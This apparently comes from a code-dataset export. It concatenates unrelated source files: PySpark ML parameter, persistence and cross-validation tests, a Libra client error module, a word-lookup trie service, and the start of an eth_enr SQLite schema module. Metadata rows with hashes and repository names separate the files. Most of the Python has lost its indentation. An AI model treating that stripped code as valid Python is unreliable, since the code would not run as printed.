self.assertTrue(testParams.isDefined(maxIter))
self.assertEqual(testParams.getMaxIter(), 10)
testParams.setMaxIter(100)
self.assertTrue(testParams.isSet(maxIter))
self.assertEqual(testParams.getMaxIter(), 100)
self.assertTrue(testParams.hasParam(inputCol.name))
self.assertFalse(testParams.hasDefault(inputCol))
self.assertFalse(testParams.isSet(inputCol))
self.assertFalse(testParams.isDefined(inputCol))
with self.assertRaises(KeyError):
testParams.getInputCol()
# Since the default is normally random, set it to a known number for debug str
testParams._setDefault(seed=41)
testParams.setSeed(43)
self.assertEqual(
testParams.explainParams(),
"\n".join(["inputCol: input column name. (undefined)",
"maxIter: max number of iterations (>= 0). (default: 10, current: 100)",
"seed: random seed. (default: 41, current: 43)"]))
def test_kmeans_param(self):
algo = KMeans()
self.assertEqual(algo.getInitMode(), "k-means||")
algo.setK(10)
self.assertEqual(algo.getK(), 10)
algo.setInitSteps(10)
self.assertEqual(algo.getInitSteps(), 10)
def test_hasseed(self):
noSeedSpecd = TestParams()
withSeedSpecd = TestParams(seed=42)
other = OtherTestParams()
# Check that we no longer use 42 as the magic number
self.assertNotEqual(noSeedSpecd.getSeed(), 42)
origSeed = noSeedSpecd.getSeed()
# Check that we only compute the seed once
self.assertEqual(noSeedSpecd.getSeed(), origSeed)
# Check that a specified seed is honored
self.assertEqual(withSeedSpecd.getSeed(), 42)
# Check that a different class has a different seed
self.assertNotEqual(other.getSeed(), noSeedSpecd.getSeed())
def test_param_property_error(self):
param_store = HasThrowableProperty()
self.assertRaises(RuntimeError, lambda: param_store.test_property)
params = param_store.params # should not invoke the property 'test_property'
self.assertEqual(len(params), 1)
class FeatureTests(PySparkTestCase):
def test_binarizer(self):
b0 = Binarizer()
self.assertListEqual(b0.params, [b0.inputCol, b0.outputCol, b0.threshold])
self.assertTrue(all([~b0.isSet(p) for p in b0.params]))
self.assertTrue(b0.hasDefault(b0.threshold))
self.assertEqual(b0.getThreshold(), 0.0)
b0.setParams(inputCol="input", outputCol="output").setThreshold(1.0)
self.assertTrue(all([b0.isSet(p) for p in b0.params]))
self.assertEqual(b0.getThreshold(), 1.0)
self.assertEqual(b0.getInputCol(), "input")
self.assertEqual(b0.getOutputCol(), "output")
b0c = b0.copy({b0.threshold: 2.0})
self.assertEqual(b0c.uid, b0.uid)
self.assertListEqual(b0c.params, b0.params)
self.assertEqual(b0c.getThreshold(), 2.0)
b1 = Binarizer(threshold=2.0, inputCol="input", outputCol="output")
self.assertNotEqual(b1.uid, b0.uid)
self.assertEqual(b1.getThreshold(), 2.0)
self.assertEqual(b1.getInputCol(), "input")
self.assertEqual(b1.getOutputCol(), "output")
def test_idf(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(DenseVector([1.0, 2.0]),),
(DenseVector([0.0, 1.0]),),
(DenseVector([3.0, 0.2]),)], ["tf"])
idf0 = IDF(inputCol="tf")
self.assertListEqual(idf0.params, [idf0.inputCol, idf0.minDocFreq, idf0.outputCol])
idf0m = idf0.fit(dataset, {idf0.outputCol: "idf"})
self.assertEqual(idf0m.uid, idf0.uid,
"Model should inherit the UID from its parent estimator.")
output = idf0m.transform(dataset)
self.assertIsNotNone(output.head().idf)
def test_ngram(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
Row(input=["a", "b", "c", "d", "e"])])
ngram0 = NGram(n=4, inputCol="input", outputCol="output")
self.assertEqual(ngram0.getN(), 4)
self.assertEqual(ngram0.getInputCol(), "input")
self.assertEqual(ngram0.getOutputCol(), "output")
transformedDF = ngram0.transform(dataset)
self.assertEqual(transformedDF.head().output, ["a b c d", "b c d e"])
def test_stopwordsremover(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([Row(input=["a", "panda"])])
stopWordRemover = StopWordsRemover(inputCol="input", outputCol="output")
# Default
self.assertEqual(stopWordRemover.getInputCol(), "input")
transformedDF = stopWordRemover.transform(dataset)
self.assertEqual(transformedDF.head().output, ["panda"])
self.assertEqual(type(stopWordRemover.getStopWords()), list)
self.assertTrue(isinstance(stopWordRemover.getStopWords()[0], basestring))
# Custom
stopwords = ["panda"]
stopWordRemover.setStopWords(stopwords)
self.assertEqual(stopWordRemover.getInputCol(), "input")
self.assertEqual(stopWordRemover.getStopWords(), stopwords)
transformedDF = stopWordRemover.transform(dataset)
self.assertEqual(transformedDF.head().output, ["a"])
def test_count_vectorizer_with_binary(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(0, "a a a b b c".split(' '), SparseVector(3, {0: 1.0, 1: 1.0, 2: 1.0}),),
(1, "a a".split(' '), SparseVector(3, {0: 1.0}),),
(2, "a b".split(' '), SparseVector(3, {0: 1.0, 1: 1.0}),),
(3, "c".split(' '), SparseVector(3, {2: 1.0}),)], ["id", "words", "expected"])
cv = CountVectorizer(binary=True, inputCol="words", outputCol="features")
model = cv.fit(dataset)
transformedList = model.transform(dataset).select("features", "expected").collect()
for r in transformedList:
feature, expected = r
self.assertEqual(feature, expected)
class HasInducedError(Params):
def __init__(self):
super(HasInducedError, self).__init__()
self.inducedError = Param(self, "inducedError",
"Uniformly-distributed error added to feature")
def getInducedError(self):
return self.getOrDefault(self.inducedError)
class InducedErrorModel(Model, HasInducedError):
def __init__(self):
super(InducedErrorModel, self).__init__()
def _transform(self, dataset):
return dataset.withColumn("prediction",
dataset.feature + (rand(0) * self.getInducedError()))
class InducedErrorEstimator(Estimator, HasInducedError):
def __init__(self, inducedError=1.0):
super(InducedErrorEstimator, self).__init__()
self._set(inducedError=inducedError)
def _fit(self, dataset):
model = InducedErrorModel()
self._copyValues(model)
return model
class CrossValidatorTests(PySparkTestCase):
def test_fit_minimize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="rmse")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
cv = CrossValidator(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
cvModel = cv.fit(dataset)
bestModel = cvModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(0.0, bestModelMetric, "Best model has RMSE of 0")
def test_fit_maximize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="r2")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
cv = CrossValidator(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
cvModel = cv.fit(dataset)
bestModel = cvModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(1.0, bestModelMetric, "Best model has R-squared of 1")
def test_save_load(self):
temp_path = tempfile.mkdtemp()
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame(
[(Vectors.dense([0.0]), 0.0),
(Vectors.dense([0.4]), 1.0),
(Vectors.dense([0.5]), 0.0),
(Vectors.dense([0.6]), 1.0),
(Vectors.dense([1.0]), 1.0)] * 10,
["features", "label"])
lr = LogisticRegression()
grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
evaluator = BinaryClassificationEvaluator()
cv = CrossValidator(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator)
cvModel = cv.fit(dataset)
cvPath = temp_path + "/cv"
cv.save(cvPath)
loadedCV = CrossValidator.load(cvPath)
self.assertEqual(loadedCV.getEstimator().uid, cv.getEstimator().uid)
self.assertEqual(loadedCV.getEvaluator().uid, cv.getEvaluator().uid)
self.assertEqual(loadedCV.getEstimatorParamMaps(), cv.getEstimatorParamMaps())
cvModelPath = temp_path + "/cvModel"
cvModel.save(cvModelPath)
loadedModel = CrossValidatorModel.load(cvModelPath)
self.assertEqual(loadedModel.bestModel.uid, cvModel.bestModel.uid)
class TrainValidationSplitTests(PySparkTestCase):
def test_fit_minimize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="rmse")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
tvs = TrainValidationSplit(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
tvsModel = tvs.fit(dataset)
bestModel = tvsModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(0.0, bestModelMetric, "Best model has RMSE of 0")
def test_fit_maximize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="r2")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
tvs = TrainValidationSplit(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
tvsModel = tvs.fit(dataset)
bestModel = tvsModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(1.0, bestModelMetric, "Best model has R-squared of 1")
def test_save_load(self):
temp_path = tempfile.mkdtemp()
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame(
[(Vectors.dense([0.0]), 0.0),
(Vectors.dense([0.4]), 1.0),
(Vectors.dense([0.5]), 0.0),
(Vectors.dense([0.6]), 1.0),
(Vectors.dense([1.0]), 1.0)] * 10,
["features", "label"])
lr = LogisticRegression()
grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
evaluator = BinaryClassificationEvaluator()
tvs = TrainValidationSplit(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator)
tvsModel = tvs.fit(dataset)
tvsPath = temp_path + "/tvs"
tvs.save(tvsPath)
loadedTvs = TrainValidationSplit.load(tvsPath)
self.assertEqual(loadedTvs.getEstimator().uid, tvs.getEstimator().uid)
self.assertEqual(loadedTvs.getEvaluator().uid, tvs.getEvaluator().uid)
self.assertEqual(loadedTvs.getEstimatorParamMaps(), tvs.getEstimatorParamMaps())
tvsModelPath = temp_path + "/tvsModel"
tvsModel.save(tvsModelPath)
loadedModel = TrainValidationSplitModel.load(tvsModelPath)
self.assertEqual(loadedModel.bestModel.uid, tvsModel.bestModel.uid)
class PersistenceTest(PySparkTestCase):
def test_linear_regression(self):
lr = LinearRegression(maxIter=1)
path = tempfile.mkdtemp()
lr_path = path + "/lr"
lr.save(lr_path)
lr2 = LinearRegression.load(lr_path)
self.assertEqual(lr.uid, lr2.uid)
self.assertEqual(type(lr.uid), type(lr2.uid))
self.assertEqual(lr2.uid, lr2.maxIter.parent,
"Loaded LinearRegression instance uid (%s) did not match Param's uid (%s)"
% (lr2.uid, lr2.maxIter.parent))
self.assertEqual(lr._defaultParamMap[lr.maxIter], lr2._defaultParamMap[lr2.maxIter],
"Loaded LinearRegression instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
def test_logistic_regression(self):
lr = LogisticRegression(maxIter=1)
path = tempfile.mkdtemp()
lr_path = path + "/logreg"
lr.save(lr_path)
lr2 = LogisticRegression.load(lr_path)
self.assertEqual(lr2.uid, lr2.maxIter.parent,
"Loaded LogisticRegression instance uid (%s) "
"did not match Param's uid (%s)"
% (lr2.uid, lr2.maxIter.parent))
self.assertEqual(lr._defaultParamMap[lr.maxIter], lr2._defaultParamMap[lr2.maxIter],
"Loaded LogisticRegression instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
def _compare_pipelines(self, m1, m2):
"""
Compare 2 ML types, asserting that they are equivalent.
This currently supports:
- basic types
- Pipeline, PipelineModel
This checks:
- uid
- type
- Param values and parents
"""
self.assertEqual(m1.uid, m2.uid)
self.assertEqual(type(m1), type(m2))
if isinstance(m1, JavaParams):
self.assertEqual(len(m1.params), len(m2.params))
for p in m1.params:
self.assertEqual(m1.getOrDefault(p), m2.getOrDefault(p))
self.assertEqual(p.parent, m2.getParam(p.name).parent)
elif isinstance(m1, Pipeline):
self.assertEqual(len(m1.getStages()), len(m2.getStages()))
for s1, s2 in zip(m1.getStages(), m2.getStages()):
self._compare_pipelines(s1, s2)
elif isinstance(m1, PipelineModel):
self.assertEqual(len(m1.stages), len(m2.stages))
for s1, s2 in zip(m1.stages, m2.stages):
self._compare_pipelines(s1, s2)
else:
raise RuntimeError("_compare_pipelines does not yet support type: %s" % type(m1))
def test_pipeline_persistence(self):
"""
Pipeline[HashingTF, PCA]
"""
sqlContext = SQLContext(self.sc)
temp_path = tempfile.mkdtemp()
try:
df = sqlContext.createDataFrame([(["a", "b", "c"],), (["c", "d", "e"],)], ["words"])
tf = HashingTF(numFeatures=10, inputCol="words", outputCol="features")
pca = PCA(k=2, inputCol="features", outputCol="pca_features")
pl = Pipeline(stages=[tf, pca])
model = pl.fit(df)
pipeline_path = temp_path + "/pipeline"
pl.save(pipeline_path)
loaded_pipeline = Pipeline.load(pipeline_path)
self._compare_pipelines(pl, loaded_pipeline)
model_path = temp_path + "/pipeline-model"
model.save(model_path)
loaded_model = PipelineModel.load(model_path)
self._compare_pipelines(model, loaded_model)
finally:
try:
rmtree(temp_path)
except OSError:
pass
def test_nested_pipeline_persistence(self):
"""
Pipeline[HashingTF, Pipeline[PCA]]
"""
sqlContext = SQLContext(self.sc)
temp_path = tempfile.mkdtemp()
try:
df = sqlContext.createDataFrame([(["a", "b", "c"],), (["c", "d", "e"],)], ["words"])
tf = HashingTF(numFeatures=10, inputCol="words", outputCol="features")
pca = PCA(k=2, inputCol="features", outputCol="pca_features")
p0 = Pipeline(stages=[pca])
pl = Pipeline(stages=[tf, p0])
model = pl.fit(df)
pipeline_path = temp_path + "/pipeline"
pl.save(pipeline_path)
loaded_pipeline = Pipeline.load(pipeline_path)
self._compare_pipelines(pl, loaded_pipeline)
model_path = temp_path + "/pipeline-model"
model.save(model_path)
loaded_model = PipelineModel.load(model_path)
self._compare_pipelines(model, loaded_model)
finally:
try:
rmtree(temp_path)
except OSError:
pass
def test_write_property(self):
lr = LinearRegression(maxIter=1)
self.assertTrue(isinstance(lr.write, MLWriter))
def test_decisiontree_classifier(self):
dt = DecisionTreeClassifier(maxDepth=1)
path = tempfile.mkdtemp()
dtc_path = path + "/dtc"
dt.save(dtc_path)
dt2 = DecisionTreeClassifier.load(dtc_path)
self.assertEqual(dt2.uid, dt2.maxDepth.parent,
"Loaded DecisionTreeClassifier instance uid (%s) "
"did not match Param's uid (%s)"
% (dt2.uid, dt2.maxDepth.parent))
self.assertEqual(dt._defaultParamMap[dt.maxDepth], dt2._defaultParamMap[dt2.maxDepth],
"Loaded DecisionTreeClassifier instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
def test_decisiontree_regressor(self):
dt = DecisionTreeRegressor(maxDepth=1)
path = tempfile.mkdtemp()
dtr_path = path + "/dtr"
dt.save(dtr_path)
        dt2 = DecisionTreeRegressor.load(dtr_path)
self.assertEqual(dt2.uid, dt2.maxDepth.parent,
"Loaded DecisionTreeRegressor instance uid (%s) "
"did not match Param's uid (%s)"
% (dt2.uid, dt2.maxDepth.parent))
self.assertEqual(dt._defaultParamMap[dt.maxDepth], dt2._defaultParamMap[dt2.maxDepth],
"Loaded DecisionTreeRegressor instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
class TrainingSummaryTest(PySparkTestCase):
def test_linear_regression_summary(self):
from pyspark.mllib.linalg import Vectors
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(1.0, 2.0, Vectors.dense(1.0)),
(0.0, 2.0, Vectors.sparse(1, [], []))],
["label", "weight", "features"])
lr = LinearRegression(maxIter=5, regParam=0.0, solver="normal", weightCol="weight",
fitIntercept=False)
model = lr.fit(df)
self.assertTrue(model.hasSummary)
s = model.summary
# test that api is callable and returns expected types
self.assertGreater(s.totalIterations, 0)
self.assertTrue(isinstance(s.predictions, DataFrame))
self.assertEqual(s.predictionCol, "prediction")
self.assertEqual(s.labelCol, "label")
self.assertEqual(s.featuresCol, "features")
objHist = s.objectiveHistory
self.assertTrue(isinstance(objHist, list) and isinstance(objHist[0], float))
self.assertAlmostEqual(s.explainedVariance, 0.25, 2)
self.assertAlmostEqual(s.meanAbsoluteError, 0.0)
self.assertAlmostEqual(s.meanSquaredError, 0.0)
self.assertAlmostEqual(s.rootMeanSquaredError, 0.0)
self.assertAlmostEqual(s.r2, 1.0, 2)
self.assertTrue(isinstance(s.residuals, DataFrame))
self.assertEqual(s.numInstances, 2)
devResiduals = s.devianceResiduals
self.assertTrue(isinstance(devResiduals, list) and isinstance(devResiduals[0], float))
coefStdErr = s.coefficientStandardErrors
self.assertTrue(isinstance(coefStdErr, list) and isinstance(coefStdErr[0], float))
tValues = s.tValues
self.assertTrue(isinstance(tValues, list) and isinstance(tValues[0], float))
pValues = s.pValues
self.assertTrue(isinstance(pValues, list) and isinstance(pValues[0], float))
# test evaluation (with training dataset) produces a summary with same values
# one check is enough to verify a summary is returned, Scala version runs full test
sameSummary = model.evaluate(df)
self.assertAlmostEqual(sameSummary.explainedVariance, s.explainedVariance)
def test_logistic_regression_summary(self):
from pyspark.mllib.linalg import Vectors
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(1.0, 2.0, Vectors.dense(1.0)),
(0.0, 2.0, Vectors.sparse(1, [], []))],
["label", "weight", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01, weightCol="weight", fitIntercept=False)
model = lr.fit(df)
self.assertTrue(model.hasSummary)
s = model.summary
# test that api is callable and returns expected types
self.assertTrue(isinstance(s.predictions, DataFrame))
self.assertEqual(s.probabilityCol, "probability")
self.assertEqual(s.labelCol, "label")
self.assertEqual(s.featuresCol, "features")
objHist = s.objectiveHistory
self.assertTrue(isinstance(objHist, list) and isinstance(objHist[0], float))
self.assertGreater(s.totalIterations, 0)
self.assertTrue(isinstance(s.roc, DataFrame))
self.assertAlmostEqual(s.areaUnderROC, 1.0, 2)
self.assertTrue(isinstance(s.pr, DataFrame))
self.assertTrue(isinstance(s.fMeasureByThreshold, DataFrame))
self.assertTrue(isinstance(s.precisionByThreshold, DataFrame))
self.assertTrue(isinstance(s.recallByThreshold, DataFrame))
# test evaluation (with training dataset) produces a summary with same values
# one check is enough to verify a summary is returned, Scala version runs full test
sameSummary = model.evaluate(df)
self.assertAlmostEqual(sameSummary.areaUnderROC, s.areaUnderROC)
class OneVsRestTests(PySparkTestCase):
def test_copy(self):
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr)
ovr1 = ovr.copy({lr.maxIter: 10})
self.assertEqual(ovr.getClassifier().getMaxIter(), 5)
self.assertEqual(ovr1.getClassifier().getMaxIter(), 10)
model = ovr.fit(df)
model1 = model.copy({model.predictionCol: "indexed"})
self.assertEqual(model1.getPredictionCol(), "indexed")
def test_output_columns(self):
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr)
model = ovr.fit(df)
output = model.transform(df)
self.assertEqual(output.columns, ["label", "features", "prediction"])
class HashingTFTest(PySparkTestCase):
def test_apply_binary_term_freqs(self):
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(0, ["a", "a", "b", "c", "c", "c"])], ["id", "words"])
n = 100
hashingTF = HashingTF()
hashingTF.setInputCol("words").setOutputCol("features").setNumFeatures(n).setBinary(True)
output = hashingTF.transform(df)
features = output.select("features").first().features.toArray()
expected = Vectors.sparse(n, {(ord("a") % n): 1.0,
(ord("b") % n): 1.0,
(ord("c") % n): 1.0}).toArray()
for i in range(0, n):
self.assertAlmostEqual(features[i], expected[i], 14, "Error at " + str(i) +
": expected " + str(expected[i]) + ", got " + str(features[i]))
if __name__ == "__main__":
from pyspark.ml.tests import *
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
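# Invocation sketch (not part of the original file; assumes a local Spark checkout with
# $SPARK_HOME/python and py4j on PYTHONPATH):
#   python -m unittest pyspark.ml.tests.ParamTests -v   # run a single test class
#   python python/pyspark/ml/tests.py                   # run the whole module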
| 40.928571
| 99
| 0.623976
|
cc4a626327e7e73a246d2263da658c946326c65d
| 323
|
py
|
Python
|
src/test/testKnot/sub.py
|
qftphys/Calculation-of-thermal-conductivity-of-graphene-knot-under-strain-
|
90537448eef11b034cb252025295868591de0919
|
[
"MIT"
] | 2
|
2017-06-19T05:58:58.000Z
|
2017-09-28T08:31:29.000Z
|
src/test/testKnot/sub.py
|
qftphys/Calculation-of-thermal-conductivity-of-graphene-knot-under-strain-
|
90537448eef11b034cb252025295868591de0919
|
[
"MIT"
] | null | null | null |
src/test/testKnot/sub.py
|
qftphys/Calculation-of-thermal-conductivity-of-graphene-knot-under-strain-
|
90537448eef11b034cb252025295868591de0919
|
[
"MIT"
] | null | null | null |
from aces import Aces
class sub(Aces):
def submit(self):
opt=dict(
units="metal",
species="graphene_knot",
method="nvt",
nodes=1,
procs=12,
queue="q1.1",
runTime=10000000
,runner="mdTc"
)
app=dict(latx=70,laty=2)
self.commit(opt,app);
if __name__=='__main__':
sub().run()
| 17.944444
| 28
| 0.597523
|
91aef4be0b1227e5097cc786d0d3c5b3108eb06c
| 582
|
py
|
Python
|
libra_client/error.py
|
yuan-xy/libra-client
|
697058bfa7bc8e8a7a2598dae4bb289f44524dba
|
[
"MIT"
] | 30
|
2019-09-16T12:50:33.000Z
|
2020-10-27T20:06:26.000Z
|
libra_client/error.py
|
yuan-xy/libra-client
|
697058bfa7bc8e8a7a2598dae4bb289f44524dba
|
[
"MIT"
] | 7
|
2019-09-18T14:23:09.000Z
|
2020-03-31T10:10:04.000Z
|
libra_client/error.py
|
yuan-xy/libra-client
|
697058bfa7bc8e8a7a2598dae4bb289f44524dba
|
[
"MIT"
] | 12
|
2019-09-22T15:43:56.000Z
|
2020-08-07T08:51:35.000Z
|
class LibraError(Exception):
pass
class AccountError(LibraError):
pass
class TransactionError(LibraError):
@property
def error_code(self):
code, _ = self.args
return code
@property
def error_msg(self):
_, msg = self.args
return msg
class AdmissionControlError(TransactionError):
pass
class VMError(TransactionError):
pass
class MempoolError(TransactionError):
pass
class TransactionTimeoutError(LibraError):
pass
class LibraNetError(LibraError):
pass
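# Usage sketch (not part of the original module): the error code and message values
# below are hypothetical.
if __name__ == '__main__':
    try:
        raise VMError(4016, "transaction validation failed")
    except TransactionError as err:
        print(err.error_code, err.error_msg)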
| 14.55
| 47
| 0.639175
|
e90345405ce81e36894a862e7308698923a12cdf
| 591
|
py
|
Python
|
wordservice/src/wordservice/word_service.py
|
mjm461/step-funtions-example
|
3cd77cdc03b42d7496e47e505c19161b4913b110
|
[
"MIT"
] | null | null | null |
wordservice/src/wordservice/word_service.py
|
mjm461/step-funtions-example
|
3cd77cdc03b42d7496e47e505c19161b4913b110
|
[
"MIT"
] | null | null | null |
wordservice/src/wordservice/word_service.py
|
mjm461/step-funtions-example
|
3cd77cdc03b42d7496e47e505c19161b4913b110
|
[
"MIT"
] | null | null | null |
import os
from .trie import Trie
class WordService(object):
_resources_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), 'resources'))
def __init__(self):
self._trie = Trie()
with open(os.path.join(self._resources_dir, 'words_alpha.txt')) as fin:
for word in fin.read().split('\n'):
if word:
self._trie.insert(word)
def search(self, word):
return self._trie.search(word)
def starts_with(self, prefix, max_found=100):
return self._trie.starts_with(prefix, max_found=max_found)
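# Usage sketch (not part of the original module): assumes the bundled
# resources/words_alpha.txt is present, exactly as the constructor already expects.
if __name__ == '__main__':
    service = WordService()
    print(service.search('hello'))
    print(service.starts_with('hel', max_found=5))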
| 28.142857
| 91
| 0.632826
|
4025398e90983cf52a5e14807954e78264750801
| 1,925
|
py
|
Python
|
python/GafferTractorUI/__init__.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | 1
|
2019-08-02T16:49:59.000Z
|
2019-08-02T16:49:59.000Z
|
python/GafferTractorUI/__init__.py
|
rkoschmitzky/gaffer
|
ec6262ae1292767bdeb9520d1447d65a4a511884
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferTractorUI/__init__.py
|
rkoschmitzky/gaffer
|
ec6262ae1292767bdeb9520d1447d65a4a511884
|
[
"BSD-3-Clause"
] | 1
|
2020-12-21T12:33:49.000Z
|
2020-12-21T12:33:49.000Z
|
##########################################################################
#
# Copyright (c) 2016, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import TractorDispatcherUI
__import__( "IECore" ).loadConfig( "GAFFER_STARTUP_PATHS", subdirectory = "GafferTractorUI" )
| 48.125
| 93
| 0.688831
|
2185d391562abc2f45a9a0c1ad300920121c042e
| 11,563
|
py
|
Python
|
eth_enr/sqlite3_db.py
|
ethereum/eth-enr
|
80bd08a3be09a6a1f6cc3145e44851e1e1bf71d9
|
[
"MIT"
] | 4
|
2020-09-01T07:46:51.000Z
|
2021-11-04T14:09:02.000Z
|
eth_enr/sqlite3_db.py
|
ethereum/eth-enr
|
80bd08a3be09a6a1f6cc3145e44851e1e1bf71d9
|
[
"MIT"
] | 9
|
2020-09-02T01:56:09.000Z
|
2020-11-30T16:00:01.000Z
|
eth_enr/sqlite3_db.py
|
ethereum/eth-enr
|
80bd08a3be09a6a1f6cc3145e44851e1e1bf71d9
|
[
"MIT"
] | 6
|
2020-08-31T22:31:47.000Z
|
2022-03-28T18:50:04.000Z
|
import datetime
import logging
import operator
import sqlite3
from typing import Collection, Iterable, NamedTuple, Optional, Sequence, Tuple, Union
from eth_typing import NodeID
import rlp
from rlp.exceptions import DecodingError, DeserializationError, SerializationError
from eth_enr.abc import ENRAPI
from eth_enr.enr import ENR
from eth_enr.sedes import ENR_KEY_SEDES_MAPPING
logger = logging.getLogger("eth_enr.sqlite3")
RECORD_CREATE_STATEMENT = """CREATE TABLE record (
node_id BLOB NOT NULL,
short_node_id INTEGER NOT NULL,
sequence_number INTEGER NOT NULL,
signature BLOB NOT NULL,
created_at DATETIME NOT NULL,
PRIMARY KEY (node_id, sequence_number),
CONSTRAINT _sequence_number_positive CHECK (sequence_number >= 0)
)
"""
RECORD_INDEXES_AND_CONSTRAINTS = (
"CREATE UNIQUE INDEX ix_node_id_sequence_number ON record (node_id, sequence_number)",
)
FIELD_CREATE_STATEMENT = """CREATE TABLE field (
node_id BLOB NOT NULL,
sequence_number INTEGER NOT NULL,
"key" BLOB NOT NULL,
value BLOB NOT NULL,
PRIMARY KEY (node_id, sequence_number, "key"),
CONSTRAINT uix_node_id_key UNIQUE (node_id, sequence_number, "key"),
FOREIGN KEY(node_id) REFERENCES record (node_id),
FOREIGN KEY(sequence_number) REFERENCES record (sequence_number)
)
"""
FIELD_INDEXES_AND_CONSTRAINTS = (
'CREATE UNIQUE INDEX ix_node_id_sequence_number_key ON field (node_id, sequence_number, "key")', # noqa: E501
)
def create_tables(conn: sqlite3.Connection) -> None:
record_table_exists = (
conn.execute(
"SELECT name FROM sqlite_master WHERE type='table' AND name=?", ("record",)
).fetchone()
is not None
)
field_table_exists = (
conn.execute(
